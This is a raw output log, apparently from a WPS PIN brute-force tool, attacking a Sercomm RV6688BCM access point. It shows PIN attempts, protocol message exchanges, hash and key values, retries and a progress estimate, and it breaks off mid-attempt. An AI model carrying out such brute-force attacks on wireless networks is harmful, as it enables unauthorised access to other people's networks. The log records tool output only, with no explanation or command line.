[P] PKR: c1:3d:27:a1:bc:4e:c7:e6:f5:91:5b:17:f1:0c:2a:bb:1b :ae:ec:14:96:09:6d:30:80:30:c4:6d:8c:a4:30:a8:54:a c:c7:dc:d2:85:52:d6:36:83:89:23:22:4a:26:83:74:4c: 4e:75:b5:67:9d:f7:57:ff:37:56:a0:9f:a2:eb:63:61:96 :7f:ab:63:1b:d4:9e:d3:a6:24:24:bc:0d:18:25:d2:99:c 1:ab:28:c5:49:3d:04:25:a1:ca:b8:6e:2d:64:c1:10:ae: 0b:1f:4b:29:29:b4:23:ec:4f:87:b6:cf:91:69:d8:92:8c :74:1e:9d:2c:2d:dc:b5:b3:ef:94:f6:2f:71:6d:d3:21:9 5:ca:59:b5:f8:e6:7f:8c:2e:e8:ba:e9:c8:07:bb:1e:58: bf:34:db:30:79:4f:dc:f1:bf:2a:dc:fd:32:5b:dd:b1:fa :ed:58:1b:bc:13:dc:8a:07:1f:84:df:d5:e7:d8:10:a4:0 c:d4:66:ba:0a:4c:78:38:a9<br/>
[P] AuthKey: e6:25:7e:ac:0f:64:cc:42:d1:57:0f:2e:52:f3:6d:01:35 :6e:32:67:a0:8e:67:c8:cd:a7:0b:e8:a0:bd:90:8b<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 80:80:f5:aa:c8:38:3b:b6:e6:d2:cb:a7:3b:7d:e4:94:e3 :82:bf:e5:76:51:00:c7:7e:22:33:56:50:ed:56:45<br/>
[P] E-Hash2: 21:8a:5b:09:a0:35:df:96:89:62:dd:19:75:e7:9f:ff:c0 :a9:63:6b:60:da:3f:2b:0d:1e:5e:29:30:af:d9:a4<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 54<br/>
[+] Pin count advanced: 54. Max pin attempts: 11000<br/>
[+] Trying pin 00435673.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 07:32:b0:f9:01:a6:9c:4e:3f:ae:41:de:24:05:94:a8<br/>
[P] PKE: 66:16:b2:4d:5b:8e:47:2e:bc:d9:9c:eb:57:c6:f1:f0:4c :a0:04:a0:42:0c:fd:ee:ec:35:24:2c:c4:42:45:cf:30:b 6:bd:50:d8:80:40:da:31:6d:99:79:ae:5d:5f:61:2a:09: 63:65:58:e1:4a:fc:87:24:c0:e2:9c:f1:2e:dc:f9:98:83 :29:a2:e7:79:ff:83:ea:1e:b9:87:8e:2d:ba:0a:3f:42:0 8:61:70:2a:b6:87:3d:23:fb:78:ca:6f:3d:35:5b:25:4b: f3:76:32:b5:fe:da:0b:27:a0:3a:68:c0:f0:1b:6d:19:c4 :29:2d:36:3b:3e:47:58:c9:18:26:b7:61:2a:47:85:32:7 4:3b:a3:8d:75:c1:6b:d5:fe:be:69:38:2b:25:30:e6:5b: 52:e7:6c:c5:2a:9a:e7:c6:80:c4:71:54:ee:4b:06:b8:32 :c7:58:2b:81:8b:80:c7:4f:89:63:24:25:ef:6d:f7:15:d 0:73:83:3f:93:b5:f9:8d:aa<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 8e:7b:df:b0:9b:c2:81:8c:a6:28:17:c1:00:33:10:d3<br/>
[P] PKR: 9c:d5:83:3c:72:77:a7:50:f2:4d:73:b6:50:19:ac:1b:aa :8b:db:93:0f:49:72:f4:9c:57:1a:37:f3:2e:e9:7c:ff:6 d:88:10:42:fd:96:e1:98:4b:47:c8:1b:14:c2:a4:e3:f8: cb:fa:15:36:db:c2:5f:ae:37:c4:51:c9:5f:2b:b8:52:b6 :ca:8c:5b:86:dd:bc:cd:93:71:c4:36:8e:c3:66:2f:65:f 0:5b:52:79:ac:fe:45:aa:24:e4:ce:c6:6b:d1:7a:ef:50: 72:fe:66:25:95:d9:a0:98:61:f9:46:f4:5c:20:a5:9d:3a :dc:ce:36:fd:b0:c2:3e:e7:c6:78:45:93:a6:f3:72:f8:e 8:68:35:6c:97:88:24:16:c4:1d:05:17:0e:a6:1d:0e:61: 8c:75:45:8d:8b:55:b2:81:a3:f8:95:82:95:ec:1b:5e:8a :3c:8a:37:c4:45:3e:40:bd:6a:41:82:cf:cc:27:88:37:6 5:54:f3:0f:47:1c:7b:dd:81<br/>
[P] AuthKey: 59:ae:61:09:3d:77:94:81:ae:38:e4:96:b6:01:b1:42:97 :e9:7f:2f:9d:d6:d3:cc:55:c1:f5:d0:ad:37:0d:b1<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: e0:85:e8:1d:2b:67:27:52:a9:96:e8:b5:34:01:84:96:22 :6d:b2:90:26:90:40:c4:86:97:4e:35:5a:56:f3:4c<br/>
[P] E-Hash2: 76:3c:a1:80:a2:dd:cb:39:ab:e9:6f:06:c4:a6:9b:26:d6 :f9:99:67:c4:2c:4a:01:c3:bc:57:94:1c:cc:a6:10<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 55<br/>
[+] Pin count advanced: 55. Max pin attempts: 11000<br/>
[+] Trying pin 00445672.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 22:56:aa:68:2a:c1:32:3a:0c:80:5e:87:35:40:14:49<br/>
[P] PKE: 7b:74:e0:5d:3c:8e:0d:0d:58:5f:ec:a8:5b:5c:3e:29:b8 :82:4f:37:50:bb:55:44:90:a4:91:c4:96:79:ee:4e:1f:7 e:2d:59:24:a5:a4:6f:8b:31:c7:65:07:4c:33:d0:d1:af: 8a:1f:49:d1:f2:da:33:46:4e:dd:50:ea:16:bf:59:a2:58 :f6:a1:c9:be:25:d7:9d:ca:a9:22:dc:77:60:a6:dd:85:7 d:c2:2c:b4:21:34:8a:2b:63:10:d5:10:8d:64:ee:f1:f2: 3d:f9:78:c4:99:41:2b:69:a8:51:c9:6f:5a:2b:01:88:dc :b4:c8:b8:f0:e8:7e:e8:a7:f3:9b:5c:44:60:9f:0b:22:d 7:bc:c9:8e:3f:15:95:da:15:bb:27:61:74:b5:7e:b1:2e: 0e:b0:5a:01:9b:d8:6a:02:65:80:dc:26:34:d7:40:1f:8d :11:51:01:e1:cc:44:7c:9e:64:7d:18:06:6b:73:60:14:4 c:8a:72:ed:d0:da:70:8b:b1<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: c1:e6:d7:48:2a:34:e9:cc:71:3f:42:b3:c6:5c:15:3a<br/>
[P] PKR: 85:ae:12:e9:3a:fc:c9:6c:19:99:44:92:e9:bd:2f:1f:21 :d4:85:10:32:0f:a4:2d:52:49:df:7a:00:2e:70:5f:81:f 4:e2:b8:84:4a:a9:af:d2:97:c2:dc:fe:0e:42:46:08:01: ac:2e:97:64:72:97:6d:74:20:0e:6e:44:99:05:ae:a0:aa :a6:2c:76:d8:37:8d:d2:95:74:57:53:95:98:86:0b:b7:c 1:c7:76:1b:18:e9:1d:cf:4d:d8:11:1c:35:13:bf:69:71: c3:8f:68:1a:1a:51:d5:63:e5:55:85:29:4c:b7:31:da:11 :0c:89:69:ab:97:83:6e:c3:9a:7e:a0:9c:58:42:e4:47:f 0:d5:fe:0e:1e:ba:9c:fa:c6:58:37:12:67:73:a4:93:7c: b6:08:4d:64:be:52:6a:e8:f7:09:9f:15:50:f9:e5:25:0c :29:51:c6:69:8b:d2:a9:5f:6f:e5:14:cd:57:73:68:ee:1 f:58:c1:4b:ee:7e:0e:df:ee<br/>
[P] AuthKey: 5b:a1:de:57:e7:50:7d:1e:3a:70:98:81:4e:67:88:81:5a :dd:7f:50:b2:0b:1e:72:f1:8e:7a:fb:f1:e9:30:40<br/>
[+] Sending M2 message<br/>
[+] Received M1 message<br/>
[+] Sending WSC NACK<br/>
[+] Sending WSC NACK<br/>
[!] WPS transaction failed (code: 0x03), re-trying last pin<br/>
[+] 0.50% complete. Elapsed time: 0d0h0m18s.<br/>
[+] Trying pin 00445672.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 23:ca:f8:94:1d:66:34:8b:5c:15:97:5e:54:77:d9:2c<br/>
[P] PKE: e7:49:d8:bd:ec:ca:b0:fe:f4:15:84:f0:b7:0b:56:a9:1f :b5:dc:25:50:f1:b5:7f:59:0d:dd:37:4f:1f:87:19:32:4 5:11:45:f4:26:8c:40:4e:2a:56:a4:63:2c:94:54:38:0d: 42:d8:46:72:9c:0d:98:46:b3:0e:6d:c3:c4:76:a6:e3:c2 :9d:35:bf:d3:60:ba:c7:35:88:17:bb:cf:62:46:ea:82:6 9:45:b1:ed:03:52:19:35:42:86:43:43:bf:95:bf:ea:95: b4:36:2b:d1:33:f4:34:b7:38:60:98:fc:fb:68:7e:71:59 :9f:a6:99:43:59:2c:bd:fe:34:3d:62:7f:7f:67:28:33:f b:a4:46:1d:a0:58:bb:a5:33:b7:e6:fa:8e:cb:ed:c1:05: fe:bb:39:86:b2:e9:69:7e:22:e5:54:e7:d7:78:a2:37:21 :83:4d:71:93:a4:4b:44:14:61:4e:8d:23:e2:c5:39:66:0 3:f9:a9:2a:83:5c:08:6d:fd<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 0e:b3:45:1e:7d:70:c1:ed:34:c5:6a:d7:34:a5:e2:c3<br/>
[P] PKR: 4d:63:3b:b3:5b:14:c8:f2:06:aa:93:2e:ce:ad:12:84:bd :15:0b:d3:af:34:51:7c:a1:02:4c:c3:6c:cf:dd:47:db:6 1:41:23:87:56:5f:6e:38:0d:f7:30:fd:2b:d3:34:4d:3a: 15:83:3c:a2:9a:f5:30:69:35:2d:92:a7:32:aa:78:41:50 :b9:74:44:ce:d6:57:74:c4:c1:0a:39:0d:c0:7e:82:9b:8 0:4a:e4:b5:4c:4a:dc:ef:f7:ea:64:5c:27:50:32:36:19: ee:a1:c0:00:00:3a:28:04:2b:8f:fc:57:3b:68:2f:9a:a2 :87:20:3c:28:1f:96:75:69:d9:9e:d9:8b:a7:bd:4f:7a:4 0:e3:fc:fe:e7:ea:ea:eb:e2:ef:b3:71:7a:1d:cf:2f:af: 60:e1:39:b3:74:0e:87:7f:e7:08:c6:95:fe:67:ca:3d:ad :ab:52:7a:65:b5:a6:8c:41:08:4b:72:b7:92:47:ed:b5:1 3:70:42:75:20:1e:24:0e:87<br/>
[P] AuthKey: 8c:de:b4:f7:a4:db:7b:88:a8:b1:39:70:b0:36:0f:6c:ce :14:31:d3:6d:50:de:5b:79:c2:61:12:05:5e:48:59<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: fd:fc:8f:41:c0:ce:76:bf:96:fb:54:85:99:58:bc:3e:fa :6e:67:b3:36:c2:76:12:90:ab:78:bc:14:46:48:ff<br/>
[P] E-Hash2: 7b:74:0f:b5:a3:30:ad:94:76:72:19:14:ad:41:ac:b4:ea :74:08:94:2c:db:00:b3:99:3c:59:2b:ae:de:72:da<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received M3 message<br/>
[+] Sending WSC NACK<br/>
[+] Sending WSC NACK<br/>
[!] WPS transaction failed (code: 0x03), re-trying last pin<br/>
[+] Trying pin 00445672.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 65:16:05:c1:4f:86:a2:90:6b:21:5f:76:33:7d:c3:f3<br/>
[P] PKE: 88:b7:55:67:3a:61:77:9f:64:70:d7:bd:37:57:d6:7a:e4 :f6:67:7a:bd:20:9f:25:dc:53:cc:63:4b:6f:7b:1a:a4:9 2:ec:83:6a:79:42:a8:48:3a:00:06:4e:7e:b9:05:bc:37: 8d:97:ff:70:ab:b0:d8:66:29:7d:c2:c2:4f:78:0f:d1:ba :f2:60:22:39:b3:88:4c:4a:a9:93:28:3f:d0:63:a9:39:b 6:7d:05:f0:5d:48:59:18:f9:1e:2e:24:84:e1:10:55:67: 1d:f4:65:52:2b:01:2b:8a:2d:56:ab:fe:83:5b:c0:3f:7a :d7:f9:96:63:5f:f8:03:ca:80:77:61:3c:3d:17:20:a5:1 3:42:3c:65:1a:ed:27:0a:5c:f1:55:57:d1:ee:be:c7:a7: 30:63:07:db:f7:25:0c:3b:fb:81:be:5f:ab:bd:d9:3a:4a :71:e5:63:fb:65:5b:6a:47:23:9e:77:0d:73:a5:c4:1d:7 f:12:2d:df:65:ec:ce:76:94<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: d2:b8:5d:87:2d:95:3c:f8:8c:d7:3b:36:e9:63:78:55<br/>
[P] PKR: f9:6f:c6:8c:02:b8:d9:36:7f:aa:a5:3b:f5:82:4b:7a:f2 :54:29:a3:10:61:a1:3c:74:85:54:c2:e3:b0:e1:25:43:7 f:5a:8d:1d:e3:5e:00:bd:3b:06:2f:88:9d:ef:74:91:b8: 1e:dd:3a:fe:7b:60:76:6c:46:dd:b8:9b:a5:d5:4b:98:7c :cb:96:db:4b:9b:a0:46:6c:fb:e3:b0:59:cc:d1:77:e0:b a:d7:75:9c:af:19:5e:62:d5:b5:37:a5:7a:0f:6e:91:74: bc:69:7f:39:1a:92:b8:34:8e:12:0d:a0:42:55:60:65:28 :96:2f:29:a2:15:22:13:98:e5:c9:62:38:29:b3:90:e8:e f:81:68:f4:17:4b:9c:25:e2:91:31:75:d6:16:cf:8e:e9: b9:07:ce:3e:ed:ff:05:e2:6b:af:8b:80:df:6b:c8:53:76 :7e:5b:5c:df:f0:98:50:64:e6:52:b6:2e:64:ea:c1:2a:4 f:d8:23:a2:20:fa:9b:97:56<br/>
[P] AuthKey: 93:f3:df:33:90:83:8f:c3:1f:c7:eb:c1:5c:f5:2c:67:57 :59:f7:0e:3d:d8:d3:c0:43:20:66:40:df:30:6e:eb<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: cb:d8:80:d6:48:bb:fc:6b:f8:1c:b1:2b:5a:ad:54:82:bd :fd:62:34:77:e3:b2:98:85:a2:d8:b7:39:87:61:46<br/>
[P] E-Hash2: 96:0e:63:03:ea:36:84:20:3a:b4:ca:69:ac:aa:17:06:74 :b1:15:d0:d5:9d:f7:59:36:30:91:8c:2e:1e:1f:8e<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 56<br/>
[+] Pin count advanced: 56. Max pin attempts: 11000<br/>
[+] Trying pin 00455671.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 40:a7:d3:c5:79:1b:d4:4c:38:a2:c5:7c:05:3f:66:70<br/>
[P] PKE: aa:40:d4:91:37:a4:0d:0e:b1:45:55:17:a0:47:21:75:93 :a0:0f:52:ce:42:a9:e7:fa:4d:87:1c:fe:fa:55:af:53:1 f:d4:14:8c:48:47:91:bb:d3:0e:d9:2e:40:1d:58:42:f7: 19:4f:1b:5e:a1:b5:ac:2a:8e:8c:ea:e3:5c:f1:3d:66:25 :05:d0:15:7d:b6:fa:14:fb:d4:4a:ca:1f:52:bb:95:5c:4 0:19:9f:54:7b:96:00:75:65:08:a0:5d:a7:96:d0:98:ad: 8a:51:46:16:be:c0:8e:5d:41:7c:f3:82:54:6a:ce:4a:18 :90:50:a8:b3:f7:8b:d8:d3:bc:2f:da:9a:c3:c3:8e:cd:0 0:d5:d5:84:01:22:a5:28:ad:ab:5f:51:b7:73:5e:00:4f: 35:bd:75:de:43:c6:45:a8:c9:28:f9:01:2b:68:87:a1:18 :ec:ed:ef:6d:cf:d7:74:65:3b:5e:b0:47:68:2d:20:ef:1 e:9b:07:46:7c:31:b1:ad:36<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 53:fc:0e:ed:ea:6a:98:b1:f2:60:81:c7:ef:8d:c9:33<br/>
[P] PKR: 71:3f:bb:03:32:93:57:00:03:bb:51:75:77:2b:ec:dd:31 :2d:db:b2:c7:e1:92:d5:a9:75:7b:f1:b2:76:ab:ff:4a:3 8:5e:33:68:17:ef:15:d4:8c:7d:0c:d9:ea:da:bb:a5:1e: ed:4c:97:af:b8:fd:c1:9e:bd:86:83:e4:dc:82:96:44:f9 :38:5c:25:1a:49:f7:dd:ce:bc:7c:f6:d1:3a:00:ee:55:8 9:db:0c:b5:d8:69:85:c5:28:57:60:02:60:1c:17:86:d0: 8d:dd:ec:89:c6:1a:cc:5f:12:07:d2:0e:3f:1c:a1:5c:66 :ab:bc:78:b6:14:60:73:60:4d:9f:4b:d4:6e:e6:65:f1:d 4:f8:e4:10:0e:f0:f0:25:b6:cc:07:b2:c8:af:ff:49:7d: 7d:52:1f:6e:38:c5:d7:94:e3:e7:6e:aa:09:38:70:66:37 :e0:53:d2:9b:48:0b:b9:02:5d:f3:22:cc:58:8d:5e:02:e 9:82:8e:52:8f:f8:b4:10:d8<br/>
[P] AuthKey: 21:d5:dc:99:75:9b:2d:3a:6d:38:fe:6f:27:e6:b3:1f:ab :75:e8:53:b6:e0:a2:cc:49:19:cf:af:8c:3f:04:78<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 84:10:22:6e:30:cb:66:95:38:ac:02:a5:f9:6b:f8:40:70 :25:df:73:02:86:ab:a9:48:0c:d1:69:2b:60:de:fd<br/>
[P] E-Hash2: 80:1e:35:af:f6:ae:5f:73:3f:44:6a:b1:51:b2:4b:42:dd :8e:bc:b2:7e:12:2e:89:fb:38:17:96:eb:5c:2b:f0<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 57<br/>
[+] Pin count advanced: 57. Max pin attempts: 11000<br/>
[+] Trying pin 00465670.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 0a:88:9c:43:57:eb:22:b9:6d:1b:f2:25:40:7b:d4:5d<br/>
[P] PKE: b3:07:a6:ee:58:8c:c8:da:27:9d:9a:65:3f:be:94:c0:20 :a4:e2:74:af:68:1c:14:81:15:17:b1:f9:28:33:2d:be:3 2:2f:f1:49:5b:2d:76:23:2b:be:1a:38:20:41:6e:2d:f1: d7:1f:7b:c9:be:2d:60:69:64:24:be:4d:91:fa:22:9f:da :74:36:b3:e4:e2:57:81:eb:96:0a:e3:e1:ae:f6:5c:f6:4 b:74:27:7b:f7:d8:d7:79:f2:03:13:75:b1:af:6a:f2:69: cd:89:37:95:8c:f6:bc:71:9c:5c:5d:83:ec:3d:cf:25:cc :54:12:71:c1:6a:d0:2c:ac:aa:05:81:72:bf:ee:27:c0:d 2:e1:02:69:db:98:19:25:52:c2:27:38:ed:47:c2:85:7b: cf:d0:84:a0:44:1c:75:38:3a:9d:6e:26:f5:99:44:54:5b :13:09:5d:ce:87:07:f1:af:57:b8:bb:ea:dc:92:cd:7c:2 c:a5:4f:d7:bd:92:be:19:b7<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: fa:75:ad:9e:c8:5d:7d:55:b0:1f:14:53:5d:99:8c:83<br/>
[P] PKR: b7:b7:a8:76:b9:89:ad:c1:59:b0:be:7c:56:7e:08:e8:ca :4c:d4:44:51:c2:48:e2:98:f4:23:89:dd:48:dc:89:89:8 4:2f:f5:d1:c6:2e:11:ab:ad:1c:fe:30:58:02:20:78:3c: 8b:c4:d0:70:6a:1b:15:40:0a:75:ff:e7:a9:a8:f5:34:c9 :be:d8:bf:de:88:22:97:9d:1c:49:28:40:52:39:39:db:3 b:25:66:6f:9b:b9:5f:5a:c6:e7:af:e4:3b:b7:fe:1d:30: ac:0c:06:a3:61:b5:29:34:0c:c5:9e:cf:1b:2b:b4:10:9e :79:0d:f3:22:9e:61:9c:2d:8d:5e:23:32:0b:04:09:68:1 6:12:af:98:c5:89:d3:6c:f5:52:f1:c6:47:c5:41:50:ef: 2c:c4:77:99:15:b0:48:5c:a9:81:69:e5:97:4d:4a:78:31 :ae:59:64:21:a6:d9:b5:b5:f3:0c:4f:a4:ce:8a:2a:37:9 7:71:dc:16:7f:7c:43:3a:9d<br/>
[P] AuthKey: 24:8d:2e:30:f4:d8:3f:42:9a:f1:78:a6:a8:c4:f8:51:db :1c:ca:15:d1:01:cb:dd:1b:ea:7d:91:11:7b:45:e7<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 6b:cd:5c:f4:ef:9b:3f:d3:98:f9:2b:0e:7e:76:9a:97:0d :c2:bf:93:ad:83:88:89:c6:4e:77:fc:21:dd:ed:de<br/>
[P] E-Hash2: 45:79:ad:91:76:22:01:95:6f:d7:7d:bb:ed:c4:3f:3c:f5 :b7:f0:a8:5b:1c:d2:68:87:75:66:a4:f1:49:4c:a7<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 58<br/>
[+] Pin count advanced: 58. Max pin attempts: 11000<br/>
[+] Trying pin 00475679.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 65:e7:01:a6:01:44:34:90:3a:36:6d:e7:11:fc:b9:81<br/>
[P] PKE: e0:81:f5:3e:18:9d:d8:2f:d8:2f:eb:e3:c6:29:37:05:04 :f5:4d:2e:07:80:af:c0:f5:9e:b3:93:84:f3:88:e8:8d:e 9:11:2c:23:60:ad:32:76:f3:d7:eb:0f:f5:59:15:e4:96: 8d:e1:25:70:cd:6f:48:08:5a:ea:71:d6:88:35:bd:b1:2a :45:8a:90:90:8c:bc:dc:d3:fd:73:62:ef:f1:42:e4:2e:2 9:1f:a8:8a:c7:d1:0c:6c:ef:91:a4:70:96:26:3c:48:4a: df:48:97:14:2d:38:1a:6b:ae:41:2f:10:8f:60:5e:ab:17 :36:d5:10:fa:8b:52:27:99:cf:20:c9:9d:11:56:0d:dc:b f:41:d7:47:be:d9:94:e9:ce:f6:b5:b3:38:22:5c:e5:33: 67:a9:e8:86:9a:cd:4c:2a:63:0d:3a:4f:0d:83:d8:0e:b6 :ab:d0:f5:fc:3c:a6:08:94:66:5f:86:3e:15:9c:1f:a0:e 1:ea:49:28:d8:bf:d0:db:13<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: e6:22:ad:bc:e3:34:7c:fb:26:fd:9b:42:ae:ea:16:dc<br/>
[P] PKR: 9a:0b:0a:1b:f2:0d:26:7e:fa:b5:44:81:35:93:86:67:2a :16:01:01:85:c9:ea:88:2e:51:ee:26:ac:89:3e:f5:f6:9 f:63:6c:96:df:93:2c:bf:02:27:d5:8a:b5:c6:9c:88:36: 52:41:34:6f:5c:84:66:bf:79:f9:39:f6:f1:ba:d4:d6:a7 :1c:65:f4:b2:cd:0f:63:33:cd:da:88:8a:e0:7c:16:c0:9 3:81:4e:89:e4:4b:91:c0:a3:27:f8:bf:be:02:7f:36:99: 0c:d4:75:e9:7b:03:f7:60:31:97:c4:01:19:b4:1a:e3:e3 :9c:82:6b:03:45:f1:d6:0e:1b:5c:eb:90:3c:1c:94:c9:7 a:cc:41:cc:ac:fc:f5:1c:67:a8:c4:92:20:19:f2:fa:c2: 08:c7:04:66:bc:c2:ae:3c:cd:e6:51:19:d4:45:03:63:47 :77:ff:4c:50:84:db:23:6a:4b:87:5d:43:18:cb:b1:73:3 e:05:99:dd:cb:82:e9:4e:d4<br/>
[P] AuthKey: 83:6c:0e:4d:71:68:90:dd:a1:6d:57:f3:6f:f8:3b:56:5b :c5:5c:98:3e:ce:71:8e:0e:6f:6b:18:51:a7:fc:b5<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: e2:42:3f:9a:7c:d4:ca:05:b1:51:d0:c6:cc:d9:e1:41:8d :00:46:27:3f:19:28:f4:c0:68:98:89:c1:ab:da:99<br/>
[P] E-Hash2: 05:4e:7a:8c:68:64:f4:11:81:6f:c0:cc:80:4b:ef:e1:4d :73:29:33:66:3e:ca:68:e4:c2:57:ee:cc:7e:e8:b0<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 59<br/>
[+] Pin count advanced: 59. Max pin attempts: 11000<br/>
[+] 0.54% complete. Elapsed time: 0d0h0m34s.<br/>
[+] Estimated Remaining time: 0d12h9m24s<br/>
[+] Trying pin 00485678.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 41:95:46:30:2a:de:dd:6e:07:82:19:c2:63:da:92:fb<br/>
[P] PKE: 2b:12:57:5a:84:8c:7a:9e:cc:29:f3:05:db:d2:fb:18:ec :43:e9:13:5d:8d:bd:a2:e7:5f:64:3f:32:1b:34:13:89:a 2:06:31:35:17:40:ab:8e:e7:fc:36:84:d4:1a:17:75:d3: 24:39:b4:f7:8e:fb:9f:f1:7d:57:c3:d7:6f:5e:19:a9:56 :48:28:cd:e8:11:ee:4d:90:0f:d8:7b:99:65:87:04:de:1 d:d5:dc:a9:54:38:64:07:69:23:f6:b3:78:6a:d0:0e:a4: c4:7c:8a:6b:f3:80:9b:f5:9c:96:e6:09:45:79:c5:c8:70 :01:76:b9:dc:12:67:60:0c:b5:13:7e:de:fb:11:40:a7:5 0:a8:77:fc:91:4e:f8:02:6b:05:a7:b9:39:d5:55:62:23: 9c:8a:e0:53:96:c7:05:14:a6:1c:46:32:3d:af:01:2d:d0 :07:49:23:ea:69:fb:b1:09:d5:3f:a0:4a:cf:54:2b:53:e a:63:f5:c8:66:29:cd:f8:47<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 82:ea:3b:45:38:1a:d8:cc:00:44:7f:5c:5b:c8:02:32<br/>
[P] PKR: d8:a0:ca:3e:07:c4:9c:14:db:2c:00:78:b4:60:f9:27:b6 :0e:c7:b6:79:e5:48:6c:ff:24:39:e2:b8:aa:36:73:94:f 6:df:b0:a1:3d:25:d6:e2:2a:69:04:bf:0f:11:6b:20:ab: 6a:dc:48:5f:99:d3:ea:51:9a:a9:ed:91:8c:a8:f7:79:3e :20:7a:fa:34:44:44:b0:98:c9:7f:d2:a4:96:85:b5:ec:1 7:4d:83:57:5b:1b:bd:61:a7:0c:af:7d:d2:44:4c:f2:aa: 49:0c:bf:69:b3:72:0b:dd:5e:2a:47:9f:3e:61:0a:b8:ae :bc:59:73:77:48:51:66:cf:3e:33:01:af:97:51:31:98:c 1:eb:db:ec:35:46:96:4d:10:a2:c7:e3:92:db:3e:2c:31: e0:08:c6:bf:93:35:c4:82:35:9e:c6:a8:1e:12:95:bb:e3 :bb:3d:38:1d:1d:25:38:81:a7:5d:96:51:54:fa:2b:86:6 4:6f:10:eb:4a:9f:06:a6:02<br/>
[P] AuthKey: 96:ca:2b:52:db:0d:55:6d:65:84:f1:5e:a1:86:30:e9:ff :25:76:bc:b0:46:42:f7:a9:48:a7:70:75:8e:5b:5b<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: af:26:10:fb:70:f6:ea:36:c7:17:7d:16:1b:90:a4:ee:97 :62:58:cc:df:f5:a9:73:9c:2a:77:76:b5:40:02:e1<br/>
[P] E-Hash2: d8:80:d1:39:6d:be:09:f8:6e:dc:8f:da:c6:9d:77:ee:17 :b5:d0:22:b9:6e:cd:e7:46:bc:b6:4a:58:f6:de:30<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received M3 message<br/>
[+] Sending WSC NACK<br/>
[+] Sending WSC NACK<br/>
[!] WPS transaction failed (code: 0x03), re-trying last pin<br/>
[+] Trying pin 00485678.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 02:70:ca:90:5d:21:a3:f7:16:70:74:fe:02:57:58:50<br/>
